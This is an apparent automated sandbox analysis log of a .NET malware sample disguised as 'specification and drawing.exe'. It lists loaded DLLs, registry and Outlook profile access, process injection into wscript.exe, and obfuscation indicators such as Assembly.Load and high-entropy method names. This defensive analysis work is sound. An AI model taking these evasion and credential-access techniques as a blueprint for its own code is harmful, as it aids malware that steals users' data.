                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\specification and drawing.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: specification and drawing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: specification and drawing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: wscript.pdbGCTL source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LfvKCNKdvt.exe, 00000007.00000002.4581617841.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp, LfvKCNKdvt.exe, 0000000A.00000000.2476050477.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specification and drawing.exe, specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wscript.pdb source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.cs.Net Code: NZZ9TtHsjw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.cs.Net Code: NZZ9TtHsjw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_00417475 push ebx; iretd 4_2_00417478
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004034B0 push eax; ret 4_2_004034B2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_004017D0 pushfd ; retf 4_2_004017D3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C09AD push ecx; mov dword ptr [esp], ecx4_2_010C09B6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_048E09AD push ecx; mov dword ptr [esp], ecx8_2_048E09B6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00770880 push ebx; ret 8_2_00770881
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076F465 push 2BE5A8CCh; ret 8_2_0076F46A
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076BA6A push eax; ret 8_2_0076BA74
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076DBC0 push es; iretd 8_2_0076DBC1
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00763FC2 push ebx; iretd 8_2_00763FC5
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B64CB push esp; retf 8_2_047B64EA
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B7516 push eax; iretd 8_2_047B7527
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B4627 push ds; retf 8_2_047B4756
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B46F6 push ds; retf 8_2_047B4756
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047C5032 push eax; ret 8_2_047C5034
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B60E5 push ebx; iretd 8_2_047B60E6
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047C51EC push eax; retf 8_2_047C56D5
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_047B63FC push esp; retf 8_2_047B64EA
                      Source: specification and drawing.exeStatic PE information: section name: .text entropy: 7.845321462695301
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, bmS5gHjySCn9qPTuuq.csHigh entropy of concatenated method names: 'GERLH1ml1j', 'I4nLwIynUK', 'pu0LjB3PFw', 'DbeLrCQ19A', 'sU6LIusx8c', 'rZ2LmjnpJI', 'SBMLROpbo5', 'S2xLJ3X0Wr', 'L1nLfbiJZa', 'i0sL0B3JoC'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, vQGR4E4B608kaC2Y9v.csHigh entropy of concatenated method names: 'qmUCNYeQoy', 'n1JCdlhX02', 'DAZCZHEybD', 'L2ZCYy1SWk', 'rocCq5eMed', 'S9eZhS5UpG', 'jvVZ1Vfkqb', 'N5UZnI0sKR', 'XfeZP8O2LX', 'pfDZkHQ7Ep'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, ATyB1jl0Jv3AMs7G4w.csHigh entropy of concatenated method names: 'aq4DKJihLE', 'NmCD72dfla', 'iAaDxHaY7e', 'yIeDlaQj16', 'xHfDLOI5f9', 'ho3DWMs2aa', 'VoBD3nrxhO', 'YXEDgKCHwr', 'qQFDpbWxWy', 'o8fD6thdRm'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, XdtFk0djNwrtj6peMT.csHigh entropy of concatenated method names: 'Dispose', 'H2G5khnPj8', 'Gi9oIwEnk4', 'huZ6B5cKJe', 'Sb55X0w5HQ', 'Pkn5zojmBl', 'ProcessDialogKey', 'KWZoaRsHvG', 'toMo5IkL1p', 'qN9ooMKQlu'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, hRsHvGkvoMIkL1pgN9.csHigh entropy of concatenated method names: 'z7Dp4gjald', 'NFipIAPn4t', 'XJYpmQa7X2', 'v0xpRZeA8O', 'vySpJ13pkT', 'o5qpfqwc8q', 'Pccp0ZVQ6q', 'RqnpUn2SmT', 'fWwpA2cXVW', 'BlbpHW9lgG'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, U1IMZd59nhMXyFBmm5s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'meSbpHLE6v', 'neAb6VuS9V', 'u55bvqiB1d', 'YVQbbGdh5A', 'ceabOVADPo', 'QqZbsfYjDT', 'RSYbQaf9F8'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, YRD1af0CLJY5WIdLkY.csHigh entropy of concatenated method names: 'VbyYFwWHnD', 'gWVYDUnVaG', 'rtSYCaFDLM', 'QlxCXfKyIm', 'MG4CzT8eiW', 'avVYaApL2B', 'c0NY5YUJ10', 'xtIYoHn24G', 'ccNYVAT8nR', 'HxIY9d5wUm'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, Hmji8KtRaF3ssi6vZE.csHigh entropy of concatenated method names: 'x2eExHM3sc', 'oQfElrlb89', 'mnVE4Eb4lh', 'hMOEIHfffF', 'Ys5ERKqEDl', 'IfjEJjwnpE', 'xCcE01ldXB', 'S5CEU05hmx', 'Fy0EHteoMQ', 'Aw8EMLMNSL'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, OS65QEzPl4p5FPyivR.csHigh entropy of concatenated method names: 'ylS67oCquD', 'ErP6xH0lvi', 'J1U6ld1QPY', 'J9Q64DvkkE', 'Ukl6IZiy6m', 'AdI6RlnAYP', 'VkO6JAVgYq', 'yoC6QpnDYP', 'Jis68oyPwL', 'NKY6GOVGWf'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, RP00fPyhVIxHwDiKEf.csHigh entropy of concatenated method names: 'bqoZiSl0KL', 'PlEZB0Je5s', 'bU8Dmjsc4a', 'IdmDR4JSCY', 'be8DJau3N3', 'lpKDf4sxTa', 'tvTD0m4HEd', 'GTiDUHn9I2', 'gTiDAcZD7d', 'IW0DHhQNGF'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, MpEXthAlE2pr1QH9Ga.csHigh entropy of concatenated method names: 'nd6Y8wYt2f', 'KErYGIqqUt', 'acMYTxN8E2', 'Xx5YK5H8eU', 'np2YidRmpT', 'fiZY7d5n1R', 'MZAYBmLEnZ', 'T7mYxdtY3K', 'zLHYlr3Qn5', 'CJjYyP1XtV'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, ccvkXF55JJVAkRbIZiq.csHigh entropy of concatenated method names: 'HFF6XawHkT', 'trf6zSdP2x', 'gnBvaAwAGE', 'QH3v5dmE5G', 'IFIvoONjjC', 'ufcvVF1Xpm', 'Pdmv9HuSsH', 'w87vN5s7bg', 'f8LvFojpea', 'SwHvdDxAru'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, qWpum4n9pm2GhnPj8c.csHigh entropy of concatenated method names: 'hydpLNt88i', 'cHAp3I3ZHW', 'pRKpp6CFqp', 'NDOpvMxjS4', 'QwapOlmZ0F', 'qr9pQpfySQ', 'Dispose', 'DMpgFrg5nE', 'Qisgdk2ryZ', 'SrfgDTMC4A'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, yoeWtF99YePcuYKqj4.csHigh entropy of concatenated method names: 'T2Z5YODBbA', 'K335qqWbhE', 'R0J5ev3AMs', 'CG45uwrP00', 'hiK5LEfOQG', 'I4E5WB608k', 'XogGI8xJbj1kVi8dk8', 'KSBBeyNbQ0SqNBxtls', 'mDl55VsG3V', 'HbK5VbuaAD'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, QMQyG62SJ3EQdai9md.csHigh entropy of concatenated method names: 'AFG3ePJ3C4', 'DVy3ucCkOv', 'ToString', 'x0v3FikcQK', 'X063do76g6', 'zPA3DBDWw5', 'WnL3ZjMbIH', 'DDm3CyK8Q2', 'lGp3Yx77wm', 'Ljn3q8SC6D'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, u2s8fGoGVecARSbZsj.csHigh entropy of concatenated method names: 'mRLTBHbKb', 'ODfK7UIt0', 'N3P7rpdIr', 'yk6B7WEfm', 'Disl9HoWD', 'OjGyRE7Pa', 'Y9AyqtCBKejQJWKG3V', 'XJ22hUeRG09Gb2WrTP', 'RLJgpNOH3', 'dBi6IJTko'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, HQmhat5aSmtlWKU2EVV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mAX6MgTXbZ', 'dPY6wlc8V0', 'ytc6tZcUEE', 'DMq6jFexA5', 'M7y6rImW7t', 'HxP6csf9SD', 'eQO62naTA1'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, oR1TwPqxXE1yujic7I.csHigh entropy of concatenated method names: 'mWcVNsoQea', 'AtOVFJapeC', 'kyjVd8j4vt', 'ePOVDpwy10', 'hM6VZigXVK', 'quGVCJD9HC', 'M2rVYDPdkp', 'nxVVqgdXD0', 'VdYVSspXLc', 'JCLVeLlVOc'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, hODBbAxf33qWbhEBEP.csHigh entropy of concatenated method names: 'E41dj9vSwC', 'PfldrZKZQB', 'kAhdc2ginv', 'DrRd24JPU1', 'OALdhx0quV', 'm8Xd1a9yib', 'EogdnBwx4x', 'rJmdPI1lkR', 'UYKdk9pU5T', 'JoedXKAamu'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, alei22IFpaJWn2wvIn.csHigh entropy of concatenated method names: 'c4p5uxBZe34V4BxrbUd', 'RmBsuEB8u8hQ99wgaJ6', 'UFiCgMdr0e', 'jIXCpg13ao', 'mClC6JmPDO', 'zymLpRBcRHhbcYXewoa', 'TQBNM7BD7yWk7DeEKN7'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, Db4eOo1ZYyucxcLYQs.csHigh entropy of concatenated method names: 'UvL3Pi2qFT', 'm173XbTxrc', 'Px8ga1db6l', 'nmKg58JUE9', 'qBV3MWqCLV', 'OMT3wiprDT', 'YsI3tFODME', 'sdS3jtm1Eu', 'Wha3rouaof', 'DBZ3cscAQ6'
                      Source: 0.2.specification and drawing.exe.3e96f18.4.raw.unpack, OKQluEXLpruCwLCefN.csHigh entropy of concatenated method names: 'PKw6DuIXc8', 'iQS6Ze4W9e', 'zrW6CVoUsf', 'AEA6YlrLEZ', 'Mwg6p56lw5', 'kOo6q4mcRJ', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, bmS5gHjySCn9qPTuuq.csHigh entropy of concatenated method names: 'GERLH1ml1j', 'I4nLwIynUK', 'pu0LjB3PFw', 'DbeLrCQ19A', 'sU6LIusx8c', 'rZ2LmjnpJI', 'SBMLROpbo5', 'S2xLJ3X0Wr', 'L1nLfbiJZa', 'i0sL0B3JoC'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, vQGR4E4B608kaC2Y9v.csHigh entropy of concatenated method names: 'qmUCNYeQoy', 'n1JCdlhX02', 'DAZCZHEybD', 'L2ZCYy1SWk', 'rocCq5eMed', 'S9eZhS5UpG', 'jvVZ1Vfkqb', 'N5UZnI0sKR', 'XfeZP8O2LX', 'pfDZkHQ7Ep'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, ATyB1jl0Jv3AMs7G4w.csHigh entropy of concatenated method names: 'aq4DKJihLE', 'NmCD72dfla', 'iAaDxHaY7e', 'yIeDlaQj16', 'xHfDLOI5f9', 'ho3DWMs2aa', 'VoBD3nrxhO', 'YXEDgKCHwr', 'qQFDpbWxWy', 'o8fD6thdRm'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, XdtFk0djNwrtj6peMT.csHigh entropy of concatenated method names: 'Dispose', 'H2G5khnPj8', 'Gi9oIwEnk4', 'huZ6B5cKJe', 'Sb55X0w5HQ', 'Pkn5zojmBl', 'ProcessDialogKey', 'KWZoaRsHvG', 'toMo5IkL1p', 'qN9ooMKQlu'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, hRsHvGkvoMIkL1pgN9.csHigh entropy of concatenated method names: 'z7Dp4gjald', 'NFipIAPn4t', 'XJYpmQa7X2', 'v0xpRZeA8O', 'vySpJ13pkT', 'o5qpfqwc8q', 'Pccp0ZVQ6q', 'RqnpUn2SmT', 'fWwpA2cXVW', 'BlbpHW9lgG'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, U1IMZd59nhMXyFBmm5s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'meSbpHLE6v', 'neAb6VuS9V', 'u55bvqiB1d', 'YVQbbGdh5A', 'ceabOVADPo', 'QqZbsfYjDT', 'RSYbQaf9F8'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, YRD1af0CLJY5WIdLkY.csHigh entropy of concatenated method names: 'VbyYFwWHnD', 'gWVYDUnVaG', 'rtSYCaFDLM', 'QlxCXfKyIm', 'MG4CzT8eiW', 'avVYaApL2B', 'c0NY5YUJ10', 'xtIYoHn24G', 'ccNYVAT8nR', 'HxIY9d5wUm'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, Hmji8KtRaF3ssi6vZE.csHigh entropy of concatenated method names: 'x2eExHM3sc', 'oQfElrlb89', 'mnVE4Eb4lh', 'hMOEIHfffF', 'Ys5ERKqEDl', 'IfjEJjwnpE', 'xCcE01ldXB', 'S5CEU05hmx', 'Fy0EHteoMQ', 'Aw8EMLMNSL'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, OS65QEzPl4p5FPyivR.csHigh entropy of concatenated method names: 'ylS67oCquD', 'ErP6xH0lvi', 'J1U6ld1QPY', 'J9Q64DvkkE', 'Ukl6IZiy6m', 'AdI6RlnAYP', 'VkO6JAVgYq', 'yoC6QpnDYP', 'Jis68oyPwL', 'NKY6GOVGWf'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, RP00fPyhVIxHwDiKEf.csHigh entropy of concatenated method names: 'bqoZiSl0KL', 'PlEZB0Je5s', 'bU8Dmjsc4a', 'IdmDR4JSCY', 'be8DJau3N3', 'lpKDf4sxTa', 'tvTD0m4HEd', 'GTiDUHn9I2', 'gTiDAcZD7d', 'IW0DHhQNGF'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, MpEXthAlE2pr1QH9Ga.csHigh entropy of concatenated method names: 'nd6Y8wYt2f', 'KErYGIqqUt', 'acMYTxN8E2', 'Xx5YK5H8eU', 'np2YidRmpT', 'fiZY7d5n1R', 'MZAYBmLEnZ', 'T7mYxdtY3K', 'zLHYlr3Qn5', 'CJjYyP1XtV'
